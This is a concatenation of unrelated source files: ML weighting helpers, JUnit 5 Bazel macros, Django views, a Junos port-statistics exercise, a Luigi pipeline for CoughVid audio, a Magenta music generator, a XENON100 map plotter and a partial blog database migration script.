`n_samples / (n_samples * np.bincount(Y))`.
weights : array-like, shape=(n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Returns
-------
weights : array-like, shape=(n_samples,)
Weights combining sample weights and class weights.
"""
if class_weight is None and weights is None : return np.ones(len(Y))
elif weights is None : weights = np.ones(len(Y))
d = class_weight
if isinstance(d, str) and d == 'balanced':
l = len(Y) / (n_classes * np.bincount(Y))
d = {k: l[k] for k in range(len(l))}
if isinstance(d, dict):
class_weights = np.array([d[k] for k in Y])
elif d is None : class_weights = np.ones(len(Y))
else : raise ValueError("Class Weight must either be a dict or 'balanced' or None")
return weights * class_weights
def calculate_bootstrap(bootstrap_size, length):
"""
Calculate the bootstrap size for the data of given length.
Parameters
----------
bootstrap_size : int, float, default=None
Bootstrap size for training. Must be one of:
- int : Use `bootstrap_size`.
- float : Use `bootstrap_size * n_samples`.
- None : Use `n_samples`.
length : int
Length of the data to be bootstrapped.
Returns
-------
bootstrap : int
Actual bootstrap size.
"""
if bootstrap_size is None:
return length
elif isinstance(bootstrap_size, int) and bootstrap_size > 0:
return bootstrap_size
elif isinstance(bootstrap_size, float) and 0 < bootstrap_size <= 1:
return int(bootstrap_size * length)
else : raise ValueError("Bootstrap Size must be None, a positive int or float in (0,1]")
|
import pandas as pd
df_estimation = pd.read_csv('results_pooled/strucfunc_estimation.csv')
df_forecast = pd.read_csv('results_pooled/strucfunc_forecast.csv')
def make_column(df):
res = []
for i in ['1', '2', '3', '4', '5']:
m = df[i].mean()
std = df[i].std()
str = f"{m:.2f}({std:.2f})"
res.append(str)
return res
res_estimation = make_column(df_estimation)
res_forecast = make_column(df_forecast)
for i in range(5):
str = res_estimation[i] + "\t" + res_forecast[i]
print(str)
|
"""
Provides build and test targets for JUnit 5.
All of the test targets in this file support tags= and exclude_tags= parameters. These are
translated to JUnit 5 @Tag filters.
junit5_test_suite and junit5_test have the following naming convention:
${base_name}+${tags[0]}+${tags[1]}...+${tags[n]}-${exclude_tags[0]}-${exclude_tags[1]}...-${exclude_tags[m]}
This can be overridden by explicitly supplying name = "YourTestName" to the target.
"""
TEST_SIZES = [
None,
"small",
"medium",
"large",
"enormous",
]
JUNIT5_COMPONENTS = [
"jupiter",
"platform",
]
JUNIT5_GROUP_IDS = {
"jupiter": "org.junit.jupiter",
"platform": "org.junit.platform",
}
JUNIT5_ARTIFACT_ID_PATTERNS = {
"jupiter": "junit-jupiter-%s",
"platform": "junit-platform-%s",
}
JUNIT5_TEST_DEPS = [
"//third_party:junit5_jupiter_api",
]
JUNIT5_RUNTIME_DEPS = [
"//third_party:junit5_jupiter_engine",
"//third_party:junit5_platform_commons",
"//third_party:junit5_platform_console",
"//third_party:junit5_platform_engine",
"//third_party:junit5_platform_launcher",
"//third_party:opentest4j",
]
def junit5_maven_dependencies(component, artifacts, version):
"""
Create a maven_jar for each artifact.
"""
for artifact in artifacts:
junit5_maven_dependency(component, artifact, version)
def junit5_maven_dependency(component, artifact, version):
"""
Create a dependency on a JUnit 5 maven jar.
"""
if not component in JUNIT5_COMPONENTS:
fail("%s is not a JUnit 5 component." % component)
groupId = JUNIT5_GROUP_IDS[component]
artifactId = JUNIT5_ARTIFACT_ID_PATTERNS[component] % artifact
native.maven_jar(
name = _get_maven_name(component, artifact),
artifact = "%s:%s:%s" % (groupId, artifactId, version),
)
def _get_maven_name(component, artifact):
groupId = JUNIT5_GROUP_IDS[component]
artifactId = JUNIT5_ARTIFACT_ID_PATTERNS[component] % artifact
return "%s_%s" % (groupId.replace('.', '_'), artifactId.replace('-', '_'))
def junit5_java_libraries(component, artifacts, **kwargs):
for artifact in artifacts:
junit5_java_library(component, artifact, **kwargs)
def junit5_java_library(component, artifact, **kwargs):
native.java_library(
name = "junit5_%s_%s" % (component, artifact),
exports = [ "@%s//jar" % _get_maven_name(component, artifact) ],
**kwargs
)
def junit5_test_library(name, srcs, deps=[], _junit5_test_deps=JUNIT5_TEST_DEPS, **kwargs):
"""
Automatically adds JUnit 5 compile dependencies so you don't have to.
"""
native.java_library(
name = name,
srcs = srcs,
deps = deps + _junit5_test_deps,
testonly = 1,
**kwargs
)
def junit5_test_suites(sizes=TEST_SIZES, **kwargs):
"""
Create a test suite for the specified test sizes. Defaults to creating one test suite for every
possible test size, including unlabelled.
"""
for size in sizes:
junit5_test_suite(size, **kwargs)
def junit5_test_suite(size, src_dir=None, **kwargs):
"""
Create a test suite that will run every test of the given size that is included in this target,
and in this package.
If size is None, then this suite will run unlabelled tests. If size is "all", then this suite will
run every test regardless of size.
If a test is tagged with more than one size, it will only run with the larger size.
"""
if size != "all" and not size in TEST_SIZES:
fail("%s is not a valid test size." % size)
selection_flags = [
"--select-package %s" % _get_java_package(PACKAGE_NAME, src_dir)
]
if size != "all":
selection_flags += _get_size_flags(size)
size_string = size or "Unlabelled"
suite_name = size_string.capitalize() + "Tests"
_junit5_test(
base_name = suite_name,
selection_flags = selection_flags,
size = size if size != "all" else None,
**kwargs
)
def junit5_test(base_name, srcs, src_dir=None, **kwargs):
"""
Run the JUnit 5 tests in srcs.
"""
java_package = _get_java_package(PACKAGE_NAME, src_dir)
class_names = _get_class_names(java_package, srcs)
selection_flags = [ "--select-class %s" % class_name for class_name in class_names ]
_junit5_test(
base_name = base_name,
selection_flags = selection_flags,
srcs = srcs,
**kwargs
)
def _junit5_test(
base_name,
selection_flags,
name=None,
tags=[],
exclude_tags=[],
deps=[],
runtime_deps=[],
_junit5_test_deps=JUNIT5_TEST_DEPS,
_junit5_runtime_deps=JUNIT5_RUNTIME_DEPS,
**kwargs):
if name == None:
name = base_name
for tag in sorted(tags):
name += "+" + tag
for tag in sorted(exclude_tags):
name += "-" + tag
flags = selection_flags + _get_tag_flags(tags, exclude_tags)
native.java_test(
name = name,
args = flags,
main_class = "org.junit.platform.console.ConsoleLauncher",
use_testrunner = False,
deps = deps + _junit5_test_deps if deps else None,
runtime_deps = runtime_deps + _junit5_runtime_deps,
**kwargs
)
def _get_java_package(dir_path, src_dir):
if src_dir == None:
src_dirs = [ "src/main/java/", "src/test/java/", "java/", "javatests/" ]
else:
if not src_dir.endswith('/'):
src_dir += '/'
src_dirs = [ src_dir ]
for dir in src_dirs:
index = _prefix_index(dir_path, dir)
if index >= 0:
sub_path = dir_path[index:]
return sub_path.replace('/', '.')
fail("Could not find a src root: %s in path: %s" % (src_dirs, dir_path))
def _prefix_index(haystack, needle):
if needle in haystack:
return haystack.index(needle) + len(needle)
else:
return -1
def _get_size_flags(size):
if size == None:
self_flag = []
else:
self_flag = [ "-t %s" % size ]
index = TEST_SIZES.index(size)
return self_flag + [ "-T %s" % s for s in TEST_SIZES[index+1:]]
def _get_tag_flags(tags, exclude_tags):
return [ "-t %s" % tag for tag in tags ] + [ "-T %s" % tag for tag in exclude_tags ]
def _get_class_names(java_package, srcs):
class_names = []
tail = ".java"
for src in srcs:
if not src.endswith(tail):
continue
stripped_src = src[:len(src) - len(tail)]
class_names.append("%s.%s" % (java_package, stripped_src))
return class_names
|
from django.shortcuts import render, redirect,get_object_or_404
from django.http import HttpResponse,HttpResponseRedirect
from .models import Image, Profile,Instagram
from .forms import UserRegisterForm,CommentForm
from .email import send_welcome_email
from django.contrib.auth.decorators import login_required
# Create your views here.
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'registration/registration_form.html', {'form':form})
def image(request):
return render(request, 'instas/image.html')
def search_results(request):
if 'image' in request.GET and request.GET["image"]:
search_term = request.GET.get("image")
searched_images = Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'instas/search.html',{"message":message,"images": searched_images})
else:
message = "Nothing has been searched"
return render(request, 'instas/search.html',{"message":message})
pass
@login_required
def index(request):
images = Image.objects.all()
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
# comment.image = post
comment.save()
return redirect('index')
else:
form = CommentForm()
context={
'images':images,
'form': form
}
return render(request,'instas/index.html',context)
@login_required(login_url='/register/')
def likePost(request,image_id):
image = Image.objects.get(pk = image_id)
if image.likes.filter(id = request.user.id).exists():
image.likes.remove(request.user)
is_liked = False
else:
image.likes.add(request.user)
is_liked = True
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@login_required(login_url='/register/')
def add_comment_to_post(request, pk):
# post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
# comment.image = post
comment.save()
return redirect('index')
else:
form = CommentForm()
return render(request, 'instas/post_detail.html', {'form': form})
|
#!/usr/bin/env python
'''
Exercise 2 - class 10
'''
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.op.ethport import EthPortTable
from getpass import getpass
import sys
HOST = '184.105.247.76'
USER = 'pyclass'
PWD = getpass()
def remote_conn(hst, usr, pwd):
'''
Open the remote connection to the device
'''
try:
dev = Device(host=hst, user=usr, password=pwd)
o_dev = dev.open()
except exception.ConnectAuthError:
print 'Incorrect username or password'
return False
return o_dev
def main():
'''
Main function
'''
a_device = remote_conn(HOST, USER, PWD)
if not a_device:
sys.exit('Fix the above errors. Exiting...')
ports = EthPortTable(a_device)
ports.get()
for port in ports.keys():
print port
port_items = dict(ports[port].items())
print ' Oper: %s' % (port_items['oper'])
print ' rx: %s' % (port_items['rx_packets'])
print ' tx: %s' % (port_items['tx_packets'])
print
if __name__ == '__main__':
main()
|
# coding=utf-8
import pickle
import pathlib
# dictionary of unitid's to fix
# key = NSF inst_id, value = IPEDS Unitid
fixes = {
1081: 104151, # Arizona State University
100132: 109651, # Art Center College of Design
1158: 110468, # Alliant International University
8718: 129020, # University of Connecticut
1479: 133553, # Embry-Riddle Aeronautical University
1657: 143853, # Midwestern University
# 101674: 154174, # Palmer College of Chiropractic, Port Orange
330010: 160621, # Southern University and A&M College, Agricultural Research and Extension Center
29977: 162928, # Johns Hopkins University
233046: 172699, # Western Michigan University and Homer Stryker M.D. School of Medicine
102059: 176017, # University of Mississippi
100588: 181020, # Doane University
2589: 183044, # University of New Hampshire
8770: 184694, # Fairleigh Dickinson University
2671: 189088, # Bard College
# 102091: 190576, # City University of New York, Graduate School of Public Health and Health Policy
# 102060: 190576, # City University of New York, The, Advanced Science Research Center
8780: 192448, # Long Island University
# 330009: 196060, # State University of New York, University at Albany, College of Nanoscale Science and Engineering
12310: 200800, # University of Akron, The
8796: 201441, # Bowling Green State University
8805: 201885, # University of Cincinnati
8799: 203517, # Kent State University
8800: 204024, # Miami University
8802: 204796, # Ohio State University, The
8803: 204857, # Ohio University
9167: 206604, # Wright State University
# 666053: 207315, # Oklahoma State University Tulsa
8807: 207500, # University of Oklahoma, The, Norman and Health Science Center
102041: 207500, # University of Oklahoma, The, Tulsa
3198: 209065, # Linfield College
3210: 209542, # Oregon State University
# 7785: 221759, # University of Tennessee, The, Knoxville, Institute of Agriculture
353086: 221999, # Vanderbilt University and Vanderbilt University Medical Center
208828: 231624, # College of William and Mary and Virginia Institute of Marine Science
10724: 241331, # Carlos Albizu University (San Juan, PR)
41426: 459736, # Touro University
102044: 492689 # Texas Tech University Health Sciences Center, El Paso
}
file_spec = pathlib.Path.cwd() / 'data/inst_id_fixes.pickle'
with open(file_spec, 'wb') as f:
# Pickle the dictionary using the highest protocol available.
pickle.dump(fixes, f, pickle.HIGHEST_PROTOCOL)
print('All Done.')
|
#!/usr/bin/env python3
"""
WRITEME [outline the steps in the pipeline]
This pipeline preprocesses CoughVid 2.0 data.
The target is the self-reported multiclass diagnosis.
The idea is that each of these tasks should has a separate working
directory in _workdir. We remove it only when the entire pipeline
is done. This is safer, even tho it uses more disk space.
(The principle here is we don't remove any working dirs during
processing.)
When hacking on this file, consider only enabling one Task at a
time in __main__.
TODO:
* We need all the files in the README.md created for each dataset
(task.json, train.csv, etc.).
* After downloading from Zenodo, check that the zipfile has the
correct MD5.
* Would be nice to compute the 50% and 75% percentile audio length
to the metadata.
"""
import csv
import glob
import os
import shutil
import subprocess
import luigi
import numpy as np
import pandas as pd
import soundfile as sf
from slugify import slugify
from tqdm.auto import tqdm
import heareval.tasks.config.coughvid as config
import heareval.tasks.util.audio as audio_util
import heareval.tasks.util.luigi as luigi_util
from heareval.tasks.util.luigi import WorkTask
class DownloadCorpus(WorkTask):
@property
def name(self):
return type(self).__name__
def run(self):
# TODO: Change the working dir
luigi_util.download_file(
"https://zenodo.org/record/4498364/files/public_dataset.zip",
os.path.join(self.workdir, "corpus.zip"),
)
with self.output().open("w") as _:
pass
@property
def stage_number(self) -> int:
return 0
class ExtractCorpus(WorkTask):
def requires(self):
return DownloadCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
# Location of zip file to extract. Figure this out before changing
# the working directory.
corpus_zip = os.path.realpath(
os.path.join(self.requires().workdir, "corpus.zip")
)
subprocess.check_output(["unzip", "-o", corpus_zip, "-d", self.workdir])
with self.output().open("w") as _:
pass
class FilterLabeledMetadata(WorkTask):
"""
Filter the metadata (labels) to only contain audiofiles that
are labeled, and save it in metadata.csv with columns:
filename (without extension), label
"""
def requires(self):
return ExtractCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
labeldf = pd.read_csv(
os.path.join(
self.requires().workdir, "public_dataset/metadata_compiled.csv"
)
)
sublabeldf = labeldf[labeldf["status"].notnull()]
sublabeldf.to_csv(
os.path.join(self.workdir, "metadata.csv"),
columns=["uuid", "status"],
index=False,
header=False,
)
with self.output().open("w") as _:
pass
class SubsampleCorpus(WorkTask):
"""
Subsample the corpus so that we have the appropriate number of
audio files.
NOTE: We skip audio files that aren't in FilterLabeledMetadata.
Additionally, since the upstream data files might be in subfolders,
we slugify them here so that we just have one flat directory.
(TODO: Double check this works.)
A destructive way of implementing this task is that it removes
extraneous files, rather than copying them to the next task's
directory. However, one safety convention we apply is doing
non-destructive work, one working directory per task (or set
of related tasks of the same class, like resampling with different
SRs).
"""
def requires(self):
return [ExtractCorpus(), FilterLabeledMetadata()]
@property
def name(self):
return type(self).__name__
def run(self):
# Really coughvid? webm + ogg?
audiofiles = list(
glob.glob(os.path.join(self.requires()[0].workdir, "public_dataset/*.webm"))
+ glob.glob(
os.path.join(self.requires()[0].workdir, "public_dataset/*.ogg")
)
)
labeldf = pd.read_csv(
os.path.join(self.requires()[1].workdir, "metadata.csv"),
header=None,
names=["filename", "label"],
)
filename_with_labels = list(labeldf["filename"].to_numpy())
assert len(filename_with_labels) == len(set(filename_with_labels))
filename_with_labels = set(filename_with_labels)
# Filter audiofiles to only ones with labels
audiofiles = [
a
for a in audiofiles
if os.path.splitext(os.path.split(a)[1])[0] in filename_with_labels
]
assert len(audiofiles) == len(filename_with_labels)
# Make sure we found audio files to work with
if len(audiofiles) == 0:
raise RuntimeError(f"No audio files found in {self.requires()[0].workdir}")
# Deterministically randomly sort all files by their hash
audiofiles.sort(key=lambda filename: luigi_util.filename_to_int_hash(filename))
if len(audiofiles) > config.MAX_FILES_PER_CORPUS:
print(
"%d audio files in corpus, keeping only %d"
% (len(audiofiles), config.MAX_FILES_PER_CORPUS)
)
# Save diskspace using symlinks
for audiofile in audiofiles[: config.MAX_FILES_PER_CORPUS]:
# Extract the audio filename, excluding the old working
# directory, but including all subfolders
newaudiofile = os.path.join(
self.workdir,
os.path.split(
slugify(os.path.relpath(audiofile, self.requires()[0].workdir))
)[0],
# This is pretty gnarly but we do it to not slugify
# the filename extension
os.path.split(audiofile)[1],
)
# Make sure we don't have any duplicates
assert not os.path.exists(newaudiofile)
os.symlink(os.path.realpath(audiofile), newaudiofile)
with self.output().open("w") as _:
pass
class ToMonoWavCorpus(WorkTask):
"""
Convert all audio to WAV files using Sox.
We convert to mono, and also ensure that all files are the same length.
"""
def requires(self):
return SubsampleCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
audiofiles = list(
glob.glob(os.path.join(self.requires().workdir, "*.webm"))
+ glob.glob(os.path.join(self.requires().workdir, "*.ogg"))
)
for audiofile in tqdm(audiofiles):
newaudiofile = luigi_util.new_basedir(
os.path.splitext(audiofile)[0] + ".wav", self.workdir
)
audio_util.convert_to_mono_wav(audiofile, newaudiofile)
with self.output().open("w") as _:
pass
class EnsureLengthCorpus(WorkTask):
"""
Ensure all WAV files are a particular length.
There might be a one-liner in ffmpeg that we can convert to WAV
and ensure the file length at the same time.
"""
def requires(self):
return ToMonoWavCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
for audiofile in tqdm(
list(glob.glob(os.path.join(self.requires().workdir, "*.wav")))
):
x, sr = sf.read(audiofile)
target_length_samples = int(round(sr * config.SAMPLE_LENGTH_SECONDS))
# Convert to mono
if x.ndim == 2:
x = np.mean(x, axis=1)
assert x.ndim == 1, "Audio should be mono"
# Trim if necessary
x = x[:target_length_samples]
if len(x) < target_length_samples:
x = np.hstack([x, np.zeros(target_length_samples - len(x))])
assert len(x) == target_length_samples
newaudiofile = luigi_util.new_basedir(audiofile, self.workdir)
sf.write(newaudiofile, x, sr)
with self.output().open("w") as _:
pass
class SplitTrainTestCorpus(WorkTask):
"""
If there is already a train/test split, we use that.
Otherwise we deterministically
"""
def requires(self):
return EnsureLengthCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
for audiofile in tqdm(list(glob.glob(f"{self.requires().workdir}/*.wav"))):
partition = luigi_util.which_set(
audiofile, validation_percentage=0.0, testing_percentage=10.0
)
partition_dir = f"{self.workdir}/{partition}"
luigi_util.ensure_dir(partition_dir)
newaudiofile = luigi_util.new_basedir(audiofile, partition_dir)
os.symlink(os.path.realpath(audiofile), newaudiofile)
with self.output().open("w") as _:
pass
class SplitTrainTestMetadata(WorkTask):
"""
Split the metadata into train / test.
"""
def requires(self):
"""
This depends upon SplitTrainTestCorpus to get the partitioned WAV
filenames, and the subsampled metadata in SubsampleMetadata.
"""
return [SplitTrainTestCorpus(), FilterLabeledMetadata()]
@property
def name(self):
return type(self).__name__
def run(self):
# Unfortunately, this somewhat fragilely depends upon the order
# of self.requires
# Might also want "val" for some corpora
for partition in ["train", "test"]:
audiofiles = list(
glob.glob(os.path.join(self.requires()[0].workdir, partition, "*.wav"))
)
# Make sure we found audio files to work with
if len(audiofiles) == 0:
raise RuntimeError(
f"No audio files found in {self.requires()[0].workdir}/{partition}"
)
labeldf = pd.read_csv(
os.path.join(self.requires()[1].workdir, "metadata.csv"),
header=None,
names=["filename", "label"],
)
# Add WAV extension
labeldf["filename"] = labeldf["filename"] + ".wav"
audiodf = pd.DataFrame(
[os.path.split(a)[1] for a in audiofiles], columns=["filename"]
)
assert len(audiofiles) == len(audiodf.drop_duplicates())
sublabeldf = labeldf.merge(audiodf, on="filename")
sublabeldf.to_csv(
os.path.join(self.workdir, f"{partition}.csv"),
columns=["filename", "label"],
index=False,
header=False,
)
with self.output().open("w") as _:
pass
class MetadataVocabulary(WorkTask):
"""
Mapping from metadata labels to non-negative integers.
"""
def requires(self):
return SplitTrainTestMetadata()
@property
def name(self):
return type(self).__name__
def run(self):
labelset = set()
# Might also want "val" for some corpora
for partition in ["train", "test"]:
labeldf = pd.read_csv(
os.path.join(self.requires().workdir, f"{partition}.csv"),
header=None,
names=["filename", "label"],
)
labelset = labelset | set(labeldf["label"].unique().tolist())
labelcsv = csv.writer(
open(os.path.join(self.workdir, "labelvocabulary.csv"), "wt")
)
for idx, label in enumerate(sorted(list(labelset))):
labelcsv.writerow([label, idx])
with self.output().open("w") as _:
pass
class ResampleSubCorpus(WorkTask):
sr = luigi.IntParameter()
partition = luigi.Parameter()
def requires(self):
return SplitTrainTestCorpus()
@property
def name(self):
return type(self).__name__
# Since these tasks have parameters but share the same working
# directory and name, we postpend the parameters to the output
# filename, so we can track if one ResampleSubCorpus task finished
# but others didn't.
def output(self):
return luigi.LocalTarget(
"_workdir/%02d-%s-%d-%s.done"
% (self.stage_number, self.name, self.sr, self.partition)
)
def run(self):
resample_dir = f"{self.workdir}/{self.sr}/{self.partition}/"
luigi_util.ensure_dir(resample_dir)
for audiofile in tqdm(
list(glob.glob(f"{self.requires().workdir}/{self.partition}/*.wav"))
):
resampled_audiofile = luigi_util.new_basedir(audiofile, resample_dir)
audio_util.resample_wav(audiofile, resampled_audiofile, self.sr)
with self.output().open("w") as _:
pass
class FinalizeCorpus(WorkTask):
"""
Create a final corpus, no longer in _workdir but in the top-level
at directory config.TASKNAME.
"""
def requires(self):
return (
[
ResampleSubCorpus(sr, partition)
for sr in config.SAMPLE_RATES
for partition in ["train", "test", "val"]
]
+ [SplitTrainTestMetadata()]
+ [MetadataVocabulary()]
)
@property
def name(self):
return type(self).__name__
# We overwrite workdir here, because we want the output to be
# the finalized top-level task directory
@property
def workdir(self):
return os.path.join("tasks", config.TASKNAME)
def run(self):
if os.path.exists(self.workdir):
shutil.rmtree(self.workdir)
# Fragilely depends upon the order of the requires
shutil.copytree(self.requires()[0].workdir, self.workdir)
# Might also want "val" for some corpora
for partition in ["train", "test"]:
shutil.copy(
os.path.join(self.requires()[-2].workdir, f"{partition}.csv"),
self.workdir,
)
shutil.copy(
os.path.join(self.requires()[-1].workdir, "labelvocabulary.csv"),
self.workdir,
)
with self.output().open("w") as _:
pass
def main():
print("max_files_per_corpus = %d" % config.MAX_FILES_PER_CORPUS)
luigi_util.ensure_dir("_workdir")
luigi.build([FinalizeCorpus()], workers=config.NUM_WORKERS, local_scheduler=True)
if __name__ == "__main__":
main()
|
# HOW TO USE:
# gsutil -q -m cp -r 'gs://magentadata/models/music_transformer/*' <destination folder>
# python main.py -model_path=path/to/model/checkpoints/unconditional_model_16.ckpt -output_dir=/tmp -decode_length=1024 -primer_path=path/to/primer_mid -num_samples=1
# python main.py -model_path=./checkpoints/unconditional_model_16.ckpt -output_dir=./GeneratedSongs -decode_length=1024 -primer_path=./primers/sad.mid -num_samples=1
"""Unconditioned Transformer."""
import os
import time
from magenta.music.protobuf import music_pb2
import tensorflow.compat.v1 as tf # pylint: disable=import-error
tf.disable_v2_behavior()
from tensor2tensor.utils import decoding
from tensor2tensor.utils import trainer_lib
import GenerateSong.utils as utils
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged: '
'DEBUG, INFO, WARN, ERROR, or FATAL.'
)
flags.DEFINE_string(
'model_name', 'transformer',
'The pre-trained model for sampling.'
)
flags.DEFINE_string(
'hparams_set', 'transformer_tpu',
'Set of hparams to use.'
)
flags.DEFINE_string(
'model_path', './GenerateSong/checkpoints/unconditional_model_16.ckpt',
'Pre-trained model path.'
)
flags.DEFINE_string(
'primer_path', None,
'Midi file path for priming if not provided '
'model will generate sample without priming.'
)
flags.DEFINE_string(
'output_dir', './GenerateSong/GeneratedSongs',
'Midi output directory.'
)
flags.DEFINE_string(
'sample', 'random',
'Sampling method.'
)
flags.DEFINE_integer(
'max_primer_second', 20,
'Maximum number of time in seconds for priming.'
)
flags.DEFINE_integer(
'layers', 16,
'Number of hidden layers.'
)
flags.DEFINE_integer(
'beam_size', 1,
'Beam size for inference.'
)
flags.DEFINE_integer(
'decode_length', 2048,
'Length of decode result.'
)
flags.DEFINE_float(
'alpha', 0.0,
'Alpha for decoder.'
)
flags.DEFINE_integer(
'num_samples', 1,
'Number of generated samples.'
)
def generate(estimator, unconditional_encoders, decode_length, targets, primer_ns):
"""
Generate unconditioned music samples from estimator.
:param estimator: Transformer estimator.
:param unconditional_encoders: A dictionary contains key and its encoder.
:param decode_length: A number represents the duration of music snippet.
:param targets: Target input for Transformer.
:param primer_ns: Notesequence represents the primer.
:return:
"""
tf.gfile.MakeDirs(FLAGS.output_dir)
date_and_time = time.strftime('%Y-%m-%d_%H%M%S')
base_name = os.path.join(
FLAGS.output_dir,
'moodzik.mid'
)
utils.LOGGER.info('Generating %d samples with format %s' % (FLAGS.num_samples, base_name))
for i in range(FLAGS.num_samples):
utils.LOGGER.info('Generating sample %d' % i)
# Start the Estimator, loading from the specified checkpoint.
input_fn = decoding.make_input_fn_from_generator(
utils.unconditional_input_generator(targets, decode_length))
unconditional_samples = estimator.predict(
input_fn, checkpoint_path=FLAGS.model_path)
# Generate sample events.
utils.LOGGER.info('Generating sample.')
sample_ids = next(unconditional_samples)['outputs']
# Decode to NoteSequence
utils.LOGGER.info('Decoding sample id')
midi_filename = utils.decode(
sample_ids,
encoder=unconditional_encoders['targets']
)
unconditional_ns = utils.mm.midi_file_to_note_sequence(midi_filename)
# Append continuation to primer if any.
continuation_ns = utils.mm.concatenate_sequences([primer_ns, unconditional_ns])
utils.mm.sequence_proto_to_midi_file(continuation_ns, base_name.replace('*', '%03d' % i))
def run():
"""
Load Transformer model according to flags and start sampling.
:raises:
ValueError: if required flags are missing or invalid.
"""
if FLAGS.model_path is None:
raise ValueError(
'Required Transformer pre-trained model path.'
)
if FLAGS.output_dir is None:
raise ValueError(
'Required Midi output directory.'
)
if FLAGS.decode_length <= 0:
raise ValueError(
'Decode length must be > 0.'
)
problem = utils.PianoPerformanceLanguageModelProblem()
unconditional_encoders = problem.get_feature_encoders()
primer_ns = music_pb2.NoteSequence()
if FLAGS.primer_path is None:
targets = []
else:
if FLAGS.max_primer_second <= 0:
raise ValueError(
'Max primer second must be > 0.'
)
primer_ns = utils.get_primer_ns(FLAGS.primer_path, FLAGS.max_primer_second)
targets = unconditional_encoders['targets'].encode_note_sequence(primer_ns)
# Remove the end token from the encoded primer.
targets = targets[:-1]
if len(targets) >= FLAGS.decode_length:
raise ValueError(
'Primer has more or equal events than maximum sequence length:'
' %d >= %d; Aborting' % (len(targets), FLAGS.decode_length)
)
decode_length = FLAGS.decode_length - len(targets)
# Set up HParams.
hparams = trainer_lib.create_hparams(hparams_set=FLAGS.hparams_set)
trainer_lib.add_problem_hparams(hparams, problem)
hparams.num_hidden_layers = FLAGS.layers
hparams.sampling_method = FLAGS.sample
# Set up decoding HParams.
decode_hparams = decoding.decode_hparams()
decode_hparams.alpha = FLAGS.alpha
decode_hparams.beam_size = FLAGS.beam_size
# Create Estimator.
utils.LOGGER.info('Loading model')
run_config = trainer_lib.create_run_config(hparams)
estimator = trainer_lib.create_estimator(
FLAGS.model_name, hparams, run_config,
decode_hparams=decode_hparams
)
generate(estimator, unconditional_encoders, decode_length, targets, primer_ns)
def main(unused_argv):
"""Invoke run function, set log level."""
utils.LOGGER.set_verbosity(FLAGS.log)
run()
def generateSong(m):
"""Call main function."""
tf.app.run(main)
FLAGS.primer_path = f'./GenerateSong/primers/{m}.mid'
return True
|
import os
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
from pax.dsputils import InterpolatingMap
from pax.core import data_file_name
from pax import units
map_file = '../../pax/data/XENON100_s2_xy_patterns_Xerawdp0.4.5.json.gz'
try:
os.mkdir(map_file)
except FileExistsError:
pass
print("Reading map...")
maps = InterpolatingMap(data_file_name(map_file+'.json.gz'))
print("Plotting individual LCE maps")
for m in tqdm(maps.map_names):
# Reference plot of the XENON100 tpc radius
r = 0.5 * 30.6 * units.cm
theta = np.linspace(0, 2*np.pi, 200)
plt.plot(r*np.cos(theta), r*np.sin(theta), c='white')
# Plot the LCE map
maps.plot(map_name=m, to_file=os.path.join(map_file, m + '.png'))
# This is just to test the interpolation routines are working: you can skip it
#
# import numpy as np
# import matplotlib.pyplot as plt
#
# print("Calculating & plotting overall LCE map")
# r = 15.3
# d = 0.2
# y, x = np.mgrid[slice(-r, r + d, d),
# slice(-r, r + d, d)]
# z = np.zeros(x.shape)
# theta = np.linspace(0, 2*np.pi, 200)
# plt.plot(r*np.cos(theta), r*np.sin(theta), c='white')
# # Should vectorize this...
# for i in tqdm(range(len(x))):
# for j in range(len(y)):
# for m in maps.map_names:
# if m == 'total_LCE':
# continue
# z[i,j] += maps.get_value(x[i,j], y[i,j], map_name=m)
# # see http://matplotlib.org/examples/pylab_examples/pcolor_demo.html
# z[:-1:-1]
# z_min, z_max = 0, np.abs(z).max()
# plt.pcolor(x, y, z, vmin=z_min, vmax=z_max)
# plt.title('pcolor')
# plt.axis([x.min(), x.max(), y.min(), y.max()])
# plt.colorbar()
# plt.xlabel('x (cm)')
# plt.ylabel('y (cm)')
# plt.title('S2Top LCE (from MC)')
# plt.savefig('summed_lce.png')
|
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from runserver import app
from maple.extension import db, redis
from maple.model import (Blog, Tag, Category, User, TimeLine, Question,
tag_blog)
engine = create_engine('postgresql://postgres:password@localhost/blog_backup')
session = sessionmaker(bind=engine)()
def date(i):
return {"created_at": i.created_at, "updated_at": i.updated_at}
def upgrade_user():
print('upgrade user ...')
users = session.execute('select * from users;')
User.bulk_save([User(
id=user.id,
username=user.username,
email=user.email,
password=user.password,
is_superuser=user.is_superuser,
is_confirmed=user.is_confirmed) for user in users])
def upgrade_timeline():
print('upgrade timeline ...')
timelines = session.execute('select * from timeline;')
Tag.bulk_save([TimeLine(
id=i.id,
content=i.content,
is_hidden=i.hide,
user_id=i.author_id,
**date(i)) for i in timelines])
def upgrade_question():
print('upgrade question ...')
questions = session.execute('select * from questions;')
Question.bulk_save([Question(
id=i.id,
title=i.title,
is_hidden=i.is_private,
answer=i.answer,
description=i.describ,
user_id=i.author_id,
created_at=i.created_at) for i in questions])
def upgrade_blog():
print('upgrade tag ...')
tags = session.execute('select * from tags;')
Tag.bulk_save([Tag(id=i.id, name=i.name) for i in tags])
print('upgrade category ...')
categories = session.execute('select * from categories;')
Category.bulk_save([Category(id=i.id, name=i.name) for i in categories])
print('upgrade blog ...')
blogs = session.execute('select * from blogs;')
Blog.bulk_save([Blog(
id=blog.id,
title=blog.title,
content=blog.content,
content_type=blog.content_type,
is_copy=blog.is_copy,
